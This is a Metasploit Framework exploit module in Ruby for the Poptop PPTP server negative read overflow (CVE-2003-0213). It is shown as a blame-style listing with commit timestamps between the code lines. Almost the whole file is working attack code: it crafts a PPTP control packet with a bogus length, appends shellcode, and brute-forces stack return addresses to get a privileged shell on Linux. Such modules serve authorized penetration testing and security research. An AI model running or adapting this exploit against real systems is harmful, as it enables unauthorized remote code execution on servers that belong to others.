2007-02-18 00:10:39 +00:00
##
2008-10-02 05:23:59 +00:00
# $Id$
2007-02-18 00:10:39 +00:00
##
##
2010-04-30 08:40:19 +00:00
# This file is part of the Metasploit Framework and may be subject to
2007-02-18 00:10:39 +00:00
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
2009-04-13 14:33:26 +00:00
# http://metasploit.com/framework/
2007-02-18 00:10:39 +00:00
##
2007-01-28 19:02:22 +00:00
require 'msf/core'
2008-10-02 05:23:59 +00:00
class Metasploit3 < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = GreatRanking
2007-01-28 19:02:22 +00:00
2008-10-02 05:23:59 +00:00
include Msf :: Exploit :: Remote :: Tcp
include Msf :: Exploit :: Remote :: Brute
2007-01-28 19:02:22 +00:00
def initialize ( info = { } )
2010-04-30 08:40:19 +00:00
super ( update_info ( info ,
2007-01-28 19:02:22 +00:00
'Name' = > 'Poptop Negative Read Overflow' ,
'Description' = > %q{
2010-04-30 08:40:19 +00:00
This is an exploit for the Poptop negative read overflow . This will
work against versions prior to 1 . 1 . 3 - b3 and 1 . 1 . 3 - 20030409 , but I
currently do not have a good way to detect Poptop versions .
2007-01-28 19:02:22 +00:00
2010-04-30 08:40:19 +00:00
The server will by default only allow 4 concurrent manager processes
( what we run our code in ) , so you could have a max of 4 shells at once .
2007-01-28 19:02:22 +00:00
2010-04-30 08:40:19 +00:00
Using the current method of exploitation , our socket will be closed
before we have the ability to run code , preventing the use of Findsock .
2007-01-28 19:02:22 +00:00
} ,
'Author' = > 'spoonm' ,
'License' = > MSF_LICENSE ,
2007-02-18 00:10:39 +00:00
'Version' = > '$Revision$' ,
2007-01-28 19:02:22 +00:00
'References' = >
[
2009-07-16 16:02:24 +00:00
[ 'CVE' , '2003-0213' ] ,
2007-01-28 19:02:22 +00:00
[ 'OSVDB' , '3293' ] ,
[ 'URL' , 'http://securityfocus.com/archive/1/317995' ] ,
[ 'URL' , 'http://www.freewebs.com/blightninjas/' ] ,
] ,
'Privileged' = > true ,
'Payload' = >
{
# Payload space is dynamically determined
'MinNops' = > 16 ,
2009-11-24 19:35:05 +00:00
'StackAdjustment' = > - 1088 ,
'Compat' = >
{
'ConnectionType' = > '-find' ,
}
2007-01-28 19:02:22 +00:00
} ,
'SaveRegisters' = > [ 'esp' ] ,
'Platform' = > 'linux' ,
'Arch' = > ARCH_X86 ,
2010-04-30 08:40:19 +00:00
'Targets' = >
2007-01-28 19:02:22 +00:00
[
2010-04-30 08:40:19 +00:00
[ 'Linux Bruteforce' ,
{ 'Bruteforce' = >
2007-01-28 19:02:22 +00:00
{
'Start' = > { 'Ret' = > 0xbffffa00 } ,
'Stop' = > { 'Ret' = > 0xbffff000 } ,
'Step' = > 0
}
}
] ,
] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'Apr 9 2003' ) )
register_options (
[
Opt :: RPORT ( 1723 )
] , self . class )
register_advanced_options (
[
OptInt . new ( " PreReturnLength " , [ true , " Space before we hit the return address. Affects PayloadSpace. " , 220 ] ) ,
OptInt . new ( " RetLength " , [ true , " Length of returns after payload. " , 32 ] ) ,
OptInt . new ( " ExtraSpace " , [ true , " The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested. " , 0 ] ) ,
OptString . new ( " Hostname " , [ false , " PPTP Packet hostname " , '' ] ) ,
OptString . new ( " Vendor " , [ true , " PPTP Packet vendor " , 'Microsoft Windows NT' ] ) ,
] , self . class )
end
# Dynamic payload space calculation
2010-11-23 18:12:08 +00:00
def payload_space ( explicit_target = nil )
2007-01-30 04:11:14 +00:00
datastore [ 'PreReturnLength' ] . to_i + datastore [ 'ExtraSpace' ] . to_i
2007-01-28 19:02:22 +00:00
end
def build_packet ( length )
[ length , 1 , 0x1a2b3c4d , 1 , 0 ] . pack ( 'nnNnn' ) +
2010-11-23 18:12:08 +00:00
[ 1 , 0 ] . pack ( 'cc' ) +
[ 0 ] . pack ( 'n' ) +
[ 1 , 1 , 0 , 2600 ] . pack ( 'NNnn' ) +
datastore [ 'Hostname' ] . ljust ( 64 , " \x00 " ) +
datastore [ 'Vendor' ] . ljust ( 64 , " \x00 " )
2007-01-28 19:02:22 +00:00
end
def check
connect
sock . put ( build_packet ( 156 ) )
2009-11-25 02:01:27 +00:00
res = sock . get_once
2007-01-28 19:02:22 +00:00
2009-11-25 02:01:27 +00:00
if res and res =~ / MoretonBay /
2010-11-23 18:12:08 +00:00
return CheckCode :: Detected
2007-01-28 19:02:22 +00:00
end
2010-11-23 18:12:08 +00:00
return CheckCode :: Safe
2007-01-28 19:02:22 +00:00
end
2010-04-30 08:40:19 +00:00
2007-01-28 19:02:22 +00:00
def brute_exploit ( addrs )
connect
print_status ( " Trying #{ " %.8x " % addrs [ 'Ret' ] } ... " )
# Construct the evil length packet
2010-04-30 08:40:19 +00:00
packet =
2007-01-28 19:02:22 +00:00
build_packet ( 1 ) +
payload . encoded +
( [ addrs [ 'Ret' ] ] . pack ( 'V' ) * ( datastore [ 'RetLength' ] / 4 ) )
sock . put ( packet )
2010-04-30 08:40:19 +00:00
2007-01-28 19:02:22 +00:00
handler
disconnect
end
2010-04-30 08:40:19 +00:00
2009-07-16 16:02:24 +00:00
end